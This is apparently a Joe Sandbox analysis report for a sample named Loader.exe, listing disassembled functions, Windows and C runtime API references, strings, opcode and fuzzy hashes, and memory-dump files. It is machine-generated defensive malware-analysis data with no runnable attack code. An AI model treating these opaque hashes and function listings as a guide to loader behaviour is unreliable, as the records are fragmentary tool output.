String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e89c1bdbeb840ffa8339428395cfdedb46b2bd143029c754627bef18ddbcca0e
Instruction ID: cee186e811f4aa49f3f914f4c84c7db2db0b1aa9b47607f9b2efcedff820af2a
Opcode Fuzzy Hash: e89c1bdbeb840ffa8339428395cfdedb46b2bd143029c754627bef18ddbcca0e
Instruction Fuzzy Hash: C701DB35540615FFDB129F44CC05BEEB7B8FF04710F000629F821E26D0DB749940CA90

Function 001924EF Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001924FB
int.LIBCPMT ref: 0019250E

Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705

std::_Facet_Register.LIBCPMT ref: 00192541
std::_Lockit::~_Lockit.LIBCPMT ref: 00192557
Concurrency::cancel_current_task.LIBCPMT ref: 00192562

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 90a050b76b162d965ea760257da1ec0ec0487566133ab35f9e748f927da8e352
Instruction ID: 6f021000145e2226cd7a13c92aeaf2d8bfef575c5161f193c7032ba4f3f38da2
Opcode Fuzzy Hash: 90a050b76b162d965ea760257da1ec0ec0487566133ab35f9e748f927da8e352
Instruction Fuzzy Hash: CF01DF32904115FBDF19AB54E8158ED7768DFA0720B120148F4159B281EF30EE46CBC0

Function 0019307F Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019308B
int.LIBCPMT ref: 0019309E

Part of subcall function 001916DA: std::_Lockit::_Lockit.LIBCPMT ref: 001916EB
Part of subcall function 001916DA: std::_Lockit::~_Lockit.LIBCPMT ref: 00191705

std::_Facet_Register.LIBCPMT ref: 001930D1
std::_Lockit::~_Lockit.LIBCPMT ref: 001930E7
Concurrency::cancel_current_task.LIBCPMT ref: 001930F2

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: e454139d7e4a0e22431b12f76975df1ee3b082ef04f9dc2d1eced559fe0c4338
Instruction ID: a79c4938e1036861c70cb90700e6d611ca33d9745e3e702e6485fd15535a10b3
Opcode Fuzzy Hash: e454139d7e4a0e22431b12f76975df1ee3b082ef04f9dc2d1eced559fe0c4338
Instruction Fuzzy Hash: C301A736904115BBCF19AB54D8058DDB778DF90360B154145F5255B291EF30EF81C7D0

Function 00194CC6 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00194CCD
std::_Lockit::_Lockit.LIBCPMT ref: 00194CD8
std::_Lockit::~_Lockit.LIBCPMT ref: 00194D46

Part of subcall function 00194E29: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00194E41

std::locale::_Setgloballocale.LIBCPMT ref: 00194CF3
_Yarn.LIBCPMT ref: 00194D09

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: ae035912c6d8a5177192b70a617e71caac863f87bc68d2044ce5b6e0a872136c
Instruction ID: 86bc1d4191b287f2aab416022db7e2ae8be18dafdda312e61c29a7afb9323141
Opcode Fuzzy Hash: ae035912c6d8a5177192b70a617e71caac863f87bc68d2044ce5b6e0a872136c
Instruction Fuzzy Hash: 5D018475A001109BCB06EB60D8559BD7BB5FFA4750B154008E82157391CF34AF42CFC1

Function 0019AF82 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0019AF33,00000000,?,002150DC,?,?,?,0019B0D6,00000004,InitializeCriticalSectionEx,001B4C70,InitializeCriticalSectionEx), ref: 0019AF8F
GetLastError.KERNEL32(?,0019AF33,00000000,?,002150DC,?,?,?,0019B0D6,00000004,InitializeCriticalSectionEx,001B4C70,InitializeCriticalSectionEx,00000000,?,0019AE8D), ref: 0019AF99
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0019AFC1

Strings

api-ms-, xrefs: 0019AFA6

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 4e6a6b6cc29792df9b42e5011b3cf9ea616deef17f5a47442787e256dda6a2a3
Instruction ID: a773ee99e4314565ffbcdd94c29eb0dd7a0edf54f67d3193cd12de07fedd8f06
Opcode Fuzzy Hash: 4e6a6b6cc29792df9b42e5011b3cf9ea616deef17f5a47442787e256dda6a2a3
Instruction Fuzzy Hash: D7E08670684204BBEF112F72EC0AB5C3F64AF11B44F504121F90CE84E1D771DAB489C5

Function 001A575E Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(C0416D80,00000000,00000000,7622F550), ref: 001A57C1

Part of subcall function 001A9815: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001A88DA,?,00000000,-00000008), ref: 001A98C1

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001A5A1C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001A5A64
GetLastError.KERNEL32 ref: 001A5B07

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 40a0872cc8a7ac2f992eae17a792d0d2eea550d39e55a1aa73910b2466ce67e8
Instruction ID: a7195510aadb6e310c4899b6f250431b5dcb297bc215c708923e0b048c8e866c
Opcode Fuzzy Hash: 40a0872cc8a7ac2f992eae17a792d0d2eea550d39e55a1aa73910b2466ce67e8
Instruction Fuzzy Hash: 35D16979E046589FCB05CFA8D880AEDBBB6FF4A314F18456AE816EB351D730A941CB50

Function 00199F51 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0019A018
___AdjustPointer.LIBCMT ref: 0019A03B
___AdjustPointer.LIBCMT ref: 0019A0D7

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 7d09d88b6f266dff440f03eb9a5c9d7f94ee68ffd413995a3b71e903520ef18e
Instruction ID: 8163d3b21089687138d5515136ccc84ff93c8643e92a85db83e13d9e20d1854e
Opcode Fuzzy Hash: 7d09d88b6f266dff440f03eb9a5c9d7f94ee68ffd413995a3b71e903520ef18e
Instruction Fuzzy Hash: FA511572604206AFEF289F18C841BBAB7A4FF54710F58452DF905972A1E732EC98C7D2

Function 001B0546 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConso.KERNEL32(00000000,00000000,?,00000000,00000000,?,001AEF79,00000000,00000001,00000000,7622F550,?,001A5B5B,7622F550,00000000,00000000), ref: 001B055D
GetLastError.KERNEL32(?,001AEF79,00000000,00000001,00000000,7622F550,?,001A5B5B,7622F550,00000000,00000000,7622F550,7622F550,?,001A60E2,00000000), ref: 001B0569

Part of subcall function 001B052F: CloseHandle.KERNEL32(FFFFFFFE,001B0579,?,001AEF79,00000000,00000001,00000000,7622F550,?,001A5B5B,7622F550,00000000,00000000,7622F550,7622F550), ref: 001B053F

___initconout.LIBCMT ref: 001B0579

Part of subcall function 001B04F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B0520,001AEF66,7622F550,?,001A5B5B,7622F550,00000000,00000000,7622F550), ref: 001B0504

WriteConso.KERNEL32(00000000,00000000,?,00000000,?,001AEF79,00000000,00000001,00000000,7622F550,?,001A5B5B,7622F550,00000000,00000000,7622F550), ref: 001B058E

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ConsoWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 1327366883-0
Opcode ID: 25cf0224bfd10f44c6c44b3ea47f15847d31251e22572f2abf3f1e457e72b2b2
Instruction ID: e7dbcb7e6e1254848865f1ad5f568a65cb6a3c189e55c9a98c59b4ad5f245973
Opcode Fuzzy Hash: 25cf0224bfd10f44c6c44b3ea47f15847d31251e22572f2abf3f1e457e72b2b2
Instruction Fuzzy Hash: D3F0AC76500119BBCF232FA5EC089DA3F6AFF0D3A1B044610FA1996930C7328970DF90

Function 00192813 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0019281A
_strlen.LIBCMT ref: 00192832

Strings

input string: , xrefs: 0019282D, 001928F8

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: H_prolog3_catch_strlen
String ID: input string:
API String ID: 3133806014-2984214493
Opcode ID: ce736a5d45fc9bbde61dab91f933d139a14ff72c7c20b6ca41e1d06c9f1e810b
Instruction ID: 95747a5005a0d0288be9de1bb0249a4538e63c065633a2ac9f58d3308fca5cc0
Opcode Fuzzy Hash: ce736a5d45fc9bbde61dab91f933d139a14ff72c7c20b6ca41e1d06c9f1e810b
Instruction Fuzzy Hash: 88411670A44215AFCF20EF58D8D4DAC77F1BF58728F2A8259E429AB2E1C7709C41CB94

Function 00199C40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00199C7F
__IsNonwritableInCurrentImage.LIBCMT ref: 00199D33

Strings

csm, xrefs: 00199D1D

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: c62e1604d8aeb3944590d003579256170294df35c461bf69fb1c09d7cc55555e
Instruction ID: 5ff0679b84b7712cce948c77d201eaa845fe1190656a0ee32eb025c30326cf5d
Opcode Fuzzy Hash: c62e1604d8aeb3944590d003579256170294df35c461bf69fb1c09d7cc55555e
Instruction Fuzzy Hash: 21418134A00218AFCF14DFACC884A9EBBF5BF45314F148159E8199B392D731AE55CB91

Function 0019A54D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0019A572

Strings

RCC, xrefs: 0019A58C
MOC, xrefs: 0019A584

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5d45fe42a66fc1132cf195d186bcc5ec8fb0b6bf63c42121013c4d7a20d0354e
Instruction ID: 9bc3eb1ec6530c8dda50b9ee1cb7f3dd79aae598a6f2199f190a95a60c6d68aa
Opcode Fuzzy Hash: 5d45fe42a66fc1132cf195d186bcc5ec8fb0b6bf63c42121013c4d7a20d0354e
Instruction Fuzzy Hash: A3419971A00209AFCF15DF98CC81AEEBBB5FF48300F598099F904A7221D3359A50CF92

Function 00196865 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00197213
___raise_securityfailure.LIBCMT ref: 001972FB

Strings

xM!, xrefs: 001972F6

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xM!
API String ID: 3761405300-2887631340
Opcode ID: c3c2aa9df9b9ad288e4f91124ff7703c387ffec22738c4d8e4f7489606a0c916
Instruction ID: 3dc9bd8c48975e12e356b62edee3a0191d65846b81f5899807626978f3b8ebbf
Opcode Fuzzy Hash: c3c2aa9df9b9ad288e4f91124ff7703c387ffec22738c4d8e4f7489606a0c916
Instruction Fuzzy Hash: F621C2B56102019AEB04EF65F94AB903BF8BB68715F11852AE50D8B3A1EBF19980CF45

Function 00197310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0019731B
___raise_securityfailure.LIBCMT ref: 001973D8

Strings

xM!, xrefs: 001973D3

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xM!
API String ID: 3761405300-2887631340
Opcode ID: 29fee64208dab47e0c24289df156984eaa6907fa4e529ae664466df7c39ce151
Instruction ID: 781bc52f1a01f93856132eea2e42ac58a78b54b1f0192295adc12ebd4a25c895
Opcode Fuzzy Hash: 29fee64208dab47e0c24289df156984eaa6907fa4e529ae664466df7c39ce151
Instruction Fuzzy Hash: EF11A2B9511205DBDB00EF65F949AC03BB9BB68711F11D02AE90C8B3B1EBB09941DF85

Function 00191605 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019160C
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00191644

Part of subcall function 00194DC4: _Yarn.LIBCPMT ref: 00194DE3
Part of subcall function 00194DC4: _Yarn.LIBCPMT ref: 00194E07

Strings

bad locale name, xrefs: 00191652

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: cab3e5224df8b90195cf12c47e388e0b7e7bc2501b189160113119126ce69e3b
Instruction ID: d429224d767559da2c1457a5d8503cc03e3c1e9314cf89d1bbd2c5c8e094664d
Opcode Fuzzy Hash: cab3e5224df8b90195cf12c47e388e0b7e7bc2501b189160113119126ce69e3b
Instruction Fuzzy Hash: 90F030B1505B409E83359FBA8491447FBE4BE28310394CE2FE1DEC3A11D730E504CB6A

Function 001A3A31 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00215520), ref: 001A3A4E

Strings

U!, xrefs: 001A3A3D
pU!, xrefs: 001A3A5A

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: U!$pU!
API String ID: 3664257935-37195876
Opcode ID: 7a48fe372dd9c281da6a2e04c139c52e21ba5bd96fd11267518a286657643b04
Instruction ID: 22101bdb92af8cee49fd8270dbffc0d4ad85ca31185bc87b003f0f11b39c4253
Opcode Fuzzy Hash: 7a48fe372dd9c281da6a2e04c139c52e21ba5bd96fd11267518a286657643b04
Instruction Fuzzy Hash: E5E04F3AC10564AADB301A18D404390B6D55B51335F55116AF4FD921E0A3711EE58680

Analysis Process: Loader.exePID: 6972, Parent PID: 7096COMMON

Non-executed Functions

Function 001ACAFF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,001ACE1D,00000002,00000000,?,?,?,001ACE1D,?,00000000), ref: 001ACB98
GetLocaleInfoW.KERNEL32(?,20001004,001ACE1D,00000002,00000000,?,?,?,001ACE1D,?,00000000), ref: 001ACBC1
GetACP.KERNEL32(?,?,001ACE1D,?,00000000), ref: 001ACBD6

Strings

ACP, xrefs: 001ACB1D
OCP, xrefs: 001ACB53

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 50fc947b0682e007ee568eddd24dfc9ed0bf82ef3d5b0da16e4fae2313d2360f
Instruction ID: ce9f0c1a18ffe047ce796ddd8f919acc9faff751f420c6b07d3a132a0cab4665
Opcode Fuzzy Hash: 50fc947b0682e007ee568eddd24dfc9ed0bf82ef3d5b0da16e4fae2313d2360f
Instruction Fuzzy Hash: 1321867A644104AADB359F58C903AA7B3A6AF56BA0B568464E90AE7101F733DE40C3F0

Function 001ACCD4 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001ACDE0
IsValidCodePage.KERNEL32(00000000), ref: 001ACE29
IsValidLocale.KERNEL32(?,00000001), ref: 001ACE38
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001ACE80
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001ACE9F

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1f7703440d2d8baf435880d1b64074628792ab3a812af521f704b6dbc332a125
Instruction ID: 0035f00e3f13ea71b8f36073e71c013a83a0d137d69a834530de8848d3e61d73
Opcode Fuzzy Hash: 1f7703440d2d8baf435880d1b64074628792ab3a812af521f704b6dbc332a125
